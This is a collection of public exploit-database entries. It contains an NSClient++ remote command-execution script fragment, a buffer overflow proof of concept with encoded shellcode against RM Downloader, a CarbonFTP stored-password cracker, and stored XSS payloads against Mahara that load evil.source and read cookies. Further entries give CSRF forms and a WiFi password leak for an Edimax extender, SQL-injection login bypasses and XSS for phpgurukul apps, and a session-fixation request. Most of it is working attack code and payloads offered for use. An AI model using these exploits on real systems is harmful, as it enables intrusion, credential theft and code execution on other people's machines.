parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.') parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target') args = parser.parse_args() if len(sys.argv) < 4: parser.print_help() sys.exit(1) # Build base URL, grab needed arguments base_url = "https://" + args.t + ":" + args.P printStatus("Targeting base URL " + base_url, "info") password = args.p cmd = args.c # Get first auth token, and add it to headers of session s = requests.session() token = getAuthToken(s) s.headers.update({ "TOKEN" : token}) # Generate a random name, enable the feature, add the payload, # then reload. randKey = generateName() enableFeature(s) configurePayload(s, cmd, randKey) reloadConfig(s) # Since application was reloaded, need a new auth token. token = getAuthToken(s) s.headers.update({ "TOKEN" : token}) # Execute our code. triggerPayload(s, randKey)

# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) # Date: 2020-04-20 # Author: Felipe Winsnes # Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe # Version: 3.1.3.2.2010.06.13 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open 'RmDownloader.exe' # 4.- Go to 'Load' tab # 5.- Paste clipboard in 'Load' parameter # 6.- Click on button 'OK' # 7.- Two messageboxes regarding the length of the payload will pop up, click OK # 8.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" buf += b"\x50\x65\x67\x70\x41\x41" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll) buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close()

# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption # Date: 2020-04-20 # Author: hyp3rlinx # Vendor: # CVE: CVE-2020-6857 import time, string, sys, argparse, os, codecs #Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version. #This should be compatible for Python 2 and 3 versions now, tested successfully. #Sample test password #LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program. chunk_sz=5 #number of bytes we must decrypt the password by. #Password is stored here: #C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP #Neowise CarbonFTP v1.4 #Insecure Proprietary Password Encryption #By John Page (aka hyp3rlinx) #Apparition Security #=================================================== def carbonftp_conf(conf_file): p="" pipe=-1 passwd="" lst_of_passwds=[] try: for p in conf_file: idx = p.find("Password=STRING|") if idx != -1: pipe = p.find("|") if pipe != -1: passwd = p[pipe + 2: -2] print(" Password found: "+ passwd) lst_of_passwds.append(passwd) except Exception as e: print(str(e)) return lst_of_passwds def reorder(lst): k=1 j=0 for n in range(len(lst)): k+=1 j+=1 try: tmp = lst[n+k] a = lst[n+j] lst[n+j] = tmp lst[n+k] = a except Exception as e: pass return ''.join(lst) def dec2hex(dec): tmp = str(hex(int(dec))) return str(tmp[2:]) #Updated for Python version compatibility. def hex2ascii(h): h=h.strip() passwd="" try: passwd = codecs.decode(h, "hex").decode("ascii") except Exception as e: print("[!] In hex2ascii(), not a valid hex string.") exit() return passwd def chunk_passwd(passwd_lst): lst = [] for passwd in passwd_lst: while passwd: lst.append(passwd[:chunk_sz]) passwd = passwd[chunk_sz:] return lst def strip_non_printable_char(str): return ''.join([x for x in str if ord(x) > 31 or ord(x)==9]) cnt = 0 passwd_str="" def deob(c): global cnt, passwd_str tmp="" try: tmp = int(c) - int(key, 16) tmp = dec2hex(tmp) except Exception as e: print("[!] Not a valid CarbonFTP encrypted password.") exit() b="" a="" #Seems we can delete the second char as its most always junk. if cnt!=1: a = tmp[:2] cnt+=1 else: b = tmp[:4] passwd_str += strip_non_printable_char(hex2ascii(a + b)) hex_passwd_lst = list(passwd_str) return hex_passwd_lst def no_unique_chars(lst): c=0 k=1 j=0 for i in range(len(lst)): k+=1 j+=1 try: a = lst[i] b = lst[i+1] if a != b: c+=1 elif c==0: print("[!] Possible one char password?: " +str(lst[0])) return lst[0] except Exception as e: pass return False def decryptor(result_lst): global passwd_str, sz print(" Decrypting ... \n") for i in result_lst: print("[-] "+i) time.sleep(0.1) lst = deob(i) #Re-order chars to correct sequence using custom swap function (reorder). reordered_pass = reorder(lst) sz = len(reordered_pass) #Flag possible single char password. no_unique_chars(lst) print("[+] PASSWORD LENGTH: " + str(sz)) if sz == 9: return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass) #Shorter passwords less then nine chars will have several candidates #as they get padded with repeating chars so we return those. passwd_str="" return reordered_pass def display_cracked_passwd(sz, passwd): if sz==9: print("[*] PASSWORD CANDIDATES: "+ passwd + "\n") else: print("[*] DECRYPTED PASSWORD: "+passwd + "\n") def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files") parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password") return parser.parse_args() def main(args): global passwd_str, sz victim="" if args.user and args.encrypted_password: print("[!] Supply a victims username -u or single encrypted password -p, not both.") exit() print("[+] Neowise CarbonFTP v1.4") time.sleep(0.1) print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption") time.sleep(0.1) print("[+] Version 2 Exploit fixed for Python 3 compatibility") time.sleep(0.1) print("[+] Discovered and cracked by hyp3rlinx") time.sleep(0.1) print("[+] ApparitionSec\n") time.sleep(1) #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag. if args.user: victim = args.user os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/") dir_lst = os.listdir(".") for c in dir_lst: f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r") #Get encrypted password from conf file passwd_enc = carbonftp_conf(f) #Break up into 5 byte chunks as processed by the proprietary decryption routine. result_lst = chunk_passwd(passwd_enc) #Decrypt the 5 byte chunks and reassemble to the cleartext password. cracked_passwd = decryptor(result_lst) #Print cracked password or candidates. display_cracked_passwd(sz, cracked_passwd) time.sleep(0.3) passwd_str="" f.close() #Crack a single password -p flag. if args.encrypted_password: passwd_to_crack_lst = [] passwd_to_crack_lst.append(args.encrypted_password) result = chunk_passwd(passwd_to_crack_lst) #Print cracked password or candidates. cracked_passwd = decryptor(result) display_cracked_passwd(sz, cracked_passwd) if __name__=="__main__": parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) exit() main(parse_args())

# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-21 # Vendor: https://mahara.org # Software Link: https://launchpad.net/mahara # CVE: N/A Document Title: =============== Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2217 Release Date: ============= 2020-04-21 Common Vulnerability Scoring System: ==================================== 4.3 Affected Product(s): ==================== Catalyst IT Ltd. Product: Mahara v19.10.2 - CMS (Web-Application) https://launchpad.net/mahara & https://mahara.org Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Mahara v19.10.2 CMS web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `nombre` and `descripción` parameters of the `Ficheros` module in the `groupfiles.php` file. Remote attackers with low privileges are able to inject own malicious persistent script code as files and foldernames. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Files are able to be reviewed in the backend by higher privileged accounts and can be shared. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Ficheros (Files Manager) Vulnerable Input(s): [+] Crear Carpeta Vulnerable File(s): [+] groupfiles.php Vulnerable Parameter(s): [+] nombre [+] descripción Affected Module(s): [+] Página principal Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the web-application and login as regular user 2. Move inside the mygroup management 3. Open the ficheros tab on top 4. Inject test payload into the crear carpeta (Nombre & Descripción) input field for the página principal to output Note: The execution point occurs on edit, list and delete interaction 5. The created path listings are available for higher privileged user account that review (Backend) 6. Successul reproduce of the persistent cross site web vulnerability! PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) <tr id="file:7191" class="file-item folder no-hover ui-droppable"> <td class="icon-cell"> <div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191" tabindex="0"> <span class="sr-only">Seleccionar y arrastrar para mover >"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> <span class="icon-folder-open icon icon-lg " role="presentation" aria-hidden="true"></span> </div></td> <td class="filename"> <a href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27" id="changefolder:7191" class="inner-link changefolder"> <span class="sr-only">Carpeta:</span> <span class="display-title ">>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> </a></td> <td class="filedescription d-none d-md-table-cell"> >"<iframe></iframe> >"<iframe></iframe></td> <td class="filesize"></td> <td class="filedate">20/04/2020</td> <!-- Ensure space for 3 buttons (in the case of a really long single line string in a user input field --> <td class="text-right control-buttons "> <div class="btn-group"> ... ... <button name="files_filebrowser_edit[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-pencil-alt icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Edit folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span></button> <button name="files_filebrowser_delete[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-trash-alt text-danger icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Delete folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span> </button></div></td> --- PoC Session Logs [POST] --- (Mygroup Ficheros) https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------98107146915324237501974151621 Content-Length: 4879 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& files_filebrowser_edit_title=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& files_filebrowser_edit_licensor=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on& files_filebrowser_update[7191]=Guardar cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 - POST: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2- https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= - Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------126319663526561351602937008964 Content-Length: 3721 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 - GET: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2 Reference(s): https://mahara_cms.localhost:8080/artefact/ https://mahara_cms.localhost:8080/artefact/file/ https://mahara_cms.localhost:8080/artefact/file/groupfiles.php Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version CSRF PoC - Mac Filtering ---------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://172.20.10.2/goform/formWlAc" method="POST"> <input type="hidden" name="wlanAcEnabled" value="ON" /> <input type="hidden" name="tiny&#95;idx" value="0" /> <input type="hidden" name="mac" value="ccbbbbbbbbbb" /> <input type="hidden" name="comment" value="PentesterTraining" /> <input type="hidden" name="addFilterMac" value="Add" /> <input type="hidden" name="submit&#45;url" value="&#47;macfilter1&#95;sub1&#46;asp" /> <input type="hidden" name="wlanSSIDIndex" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> -- Besim ALTINOK *Security Engineer*

# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ----------------------------- Here step by step : 1. I did Setup 2. After setup try to access to *wlencrypt_wiz.asp* file 3. After access to this file, I saw some information disclosure (Like *WiFi Password*) 4. Here is the all leak here: ------------------------------- <SCRIPT> var _DATE_="Mon Sep 24 19:38:17 CST 2012"; var _VERSION_="1.13"; var _MODEL_="EW7438RPN"; var _MODE_="Edimax"; var _PLATFORM_="RTL8196CS_1200"; var _HW_LED_WPS_="4"; var _HW_LED_POWER_="6"; var _HW_LED_WIRELESS_="2"; var _HW_BUTTON_RESET_="5"; var _HW_BUTTON_WPS_="1"; var _HW_BUTTON_SWITCH_="3"; var _HW_LED_USB_="17"; var _WIRELESS_IGMPSNOOP_="y"; var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y"; var _RDISC_="y"; var _WPS_NO_BROADCAST_="y"; var _UPNP_LIB_VERSION2_="y"; var _WDS_UR_INFO_="y"; var _RESERVE_ENCRYPTION_SETTING_="y"; var _IGMP_PROXY_="y"; var _IGMPSNOOP_="y"; var _RFTYPE_="2T2R"; var _MEMBUS_="16"; var _MEMSIZE_="16"; var _MEMTYPE_="SDRAM"; var _FLASHTYPE_="SPI"; var _REMOVE_RADIUS_SERVER_="y"; var _AUTO_CHANNEL_DET_="y"; var _CONTROL_SIDEBAND_="y"; var _WIFI_11N_STANDARD_="y"; var _SETTING_WIZARD_="y"; var _CONFIG_FILE_NAME_="7438RPN"; var _AP_WITH_DNS_="y"; var _USE_DNRD_="y"; var _WPS_MIX_="y"; var _POWER_SAVING_="y"; var _WEB_FILE_NAME_="7438RPN"; var _PINCODE_BY_MAC_="y"; var _UPNP_RESPONDER_="y"; var _MDNS_RESPONDER_="y"; var _NETBIOS_RESPONDER_="y"; var _AP_WITH_DHCP_CLIENT_="y"; var _LLTD_NODENAME_="y"; var _DHCP_SWITCH_="y"; var _CONNECT_TEST_="y"; var _START_BOA_="y"; var _WPS_Daemon_="y"; var security = 1; apMode = 6; methodVal = 2; opMode = 0; apMachType = 1; var ssidTbl = new Array("PentesterTraining"); var mirrorTbl = ""; var secModeTbl = new Array("2"); var enable1XTbl = new Array("0"); var _1xMode = "0"; var wepTbl = new Array("0"); var keyTypeTbl = new Array("1"); var wpaCipherTbl = new Array("2"); var pskFormatTbl = new Array("0"); var pskValueTbl = new Array("wifipass123."); var defaultKeyIdTbl=new Array("0"); var rsIp= ""; var rsPort= "1812"; var rsPassword= ""; -- Besim ALTINOK *Security Engineer*

# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: Insert user registration information to the DB without filtering. if(isset($_POST['signup'])) { $fname=$_POST['fname']; $lname=$_POST['lname']; $email=$_POST['email']; $password=$_POST['password']; $contact=$_POST['contact']; $enc_password=$password; $msg=mysqli_query($con,"insert into users(fname,lname,email,password,contactno) values('$fname','$lname','$email','$enc_password','$contact')"); if($msg) { echo "<script>alert('Register successfully');</script>"; } } 2- In the admin dashboard: Get fullName from DB and print it without any filtering <?php $ret=mysqli_query($con,"select * from users"); $cnt=1; while($row=mysqli_fetch_array($ret)) {?> <tr> <td><?php echo $cnt;?></td> <td><?php echo $row['fname'];?></td> <td><?php echo $row['lname'];?></td> <td><?php echo $row['email'];?></td> <td><?php echo $row['contactno'];?></td> <td><?php echo $row['posting_date'];?></td> </tr> 4- If we insert value of the "fname" as "script>prompt(1)</script>", we can perform this attack as "Stored XSS"

# Exploit Title: User Management System 2.0 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here (admin login: /admin/index.php): <?php session_start(); include("dbconnection.php"); if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="manage-users.php"; $_SESSION['login']=$_POST['username']; $_SESSION['id']=$num['id']; echo "<script>window.location.href='".$extra."'</script>"; exit(); } else { $_SESSION['action1']="*Invalid username or password"; $extra="index.php"; echo "<script>window.location.href='".$extra."'</script>"; exit(); } } 2- We can bypass authentication with SQLi: Bypass code (user and admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: There is a lot of SQLi input in this project. Like, login, registration, forgot password ...

# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ************************************************* Detail: You can perform CSRF Attack for all the functions. ---------------------------------------------- CSRF PoC for Delete User ---------------------------------------------- This request performs over the GET request with uid. ------------------------------------------------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/cms/admin/manage-users.php"> <input type="hidden" name="uid" value="4" /> <input type="hidden" name="" value="" /> <input type="hidden" name="action" value="del" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Complaint Management System 4.2 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: if(isset($_POST['submit'])) { $username=$_POST['username']; $password=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="change-password.php";// $_SESSION['alogin']=$_POST['username']; $_SESSION['id']=$num['id']; $host=$_SERVER['HTTP_HOST']; $uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\'); header("location:http://$host$uri/$extra"); exit(); } 2- We can bypass authentication with SQLi: Bypass code (admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: There is a lot of SQLi input in this project. Like, login, registration, forgot password ... -----------------------------------

# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: http://localhost/cms/users/registration.php 2- Vulnerable code: Insert user registration information to the DB without filtering. if(isset($_POST['submit'])) { $fullname=$_POST['fullname']; $email=$_POST['email']; $password=md5($_POST['password']); $contactno=$_POST['contactno']; $status=1; $query=mysqli_query($con,"insert into users(fullName,userEmail,password,contactNo,status) values('$fullname','$email','$password','$contactno','$status')"); $msg="Registration successfull. Now You can login !"; } ?> 3- In the admin dashboard: Get fullName from DB and print it without any filtering <tr> <td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td> </tr> 4- If we insert "fullName" as "script>prompt(2)</script>", we can perform this attack as "Stored XSS" 5- Picture in the Attachemnt ---------------------------------------------------

# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation # Date: 2020-04-22 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://kaasoft.pro/ # Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281 # Product Version: v2.2.0 # Product : Library CMS # Vulernability Type : Broken Authentication # Vulenrability : Session Fixation # CVE : N/A # Description : Session Fixation vulnerability has been discovered in v2.2.0 version of Library CMS Powerful Book Management System. Admin HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD Member HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 50 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD

